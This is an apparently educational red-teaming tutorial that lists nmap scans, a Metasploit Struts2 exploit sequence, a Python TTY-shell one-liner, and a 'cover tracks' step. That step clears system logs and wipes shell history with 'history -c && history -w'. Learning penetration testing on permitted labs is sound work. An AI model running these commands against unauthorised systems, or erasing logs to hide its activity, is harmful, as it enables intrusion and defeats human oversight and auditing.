A collection of guides and tutorials by Dante.
Embark on your Red-Teaming journey with this step-by-step guide, designed to take you from a novice to a skilled practitioner.
OSINT is the foundation of cybersecurity. It involves gathering publicly available information to better understand your target.
Run a simple nmap scan to gather basic information:
nmap -sS -sV [Target-IP]
Tip: Start practicing on ethical platforms like TryHackMe or Hack The Box.
Identify open ports, services, and vulnerabilities in your target systems.
nmap
to discover open ports and services.Nessus
or OpenVAS
to find weaknesses.nmap -A -T4 [Target-IP]
This performs aggressive scanning, including OS detection, version detection, and traceroute.
Exploit vulnerabilities to gain unauthorized access to systems. This phase requires ethical intent and permission.
Metasploit
to exploit vulnerabilities.Use Metasploit to exploit a known vulnerability:
msfconsole
use exploit/multi/http/struts2_content_type_ognl
set RHOST [Target-IP]
exploit
Once access is gained, stabilize and maintain your connection for further actions.
Spawn a stable TTY shell:
python3 -c 'import pty; pty.spawn("/bin/bash")'
Remove evidence of your activity to avoid detection.
/var/log
or event viewer (Windows).history -c && history -w
Note: Ethical hackers should document activities for reporting rather than clearing tracks.
Start your journey with practical labs:
Start small, keep learning, and stay ethical. 🚀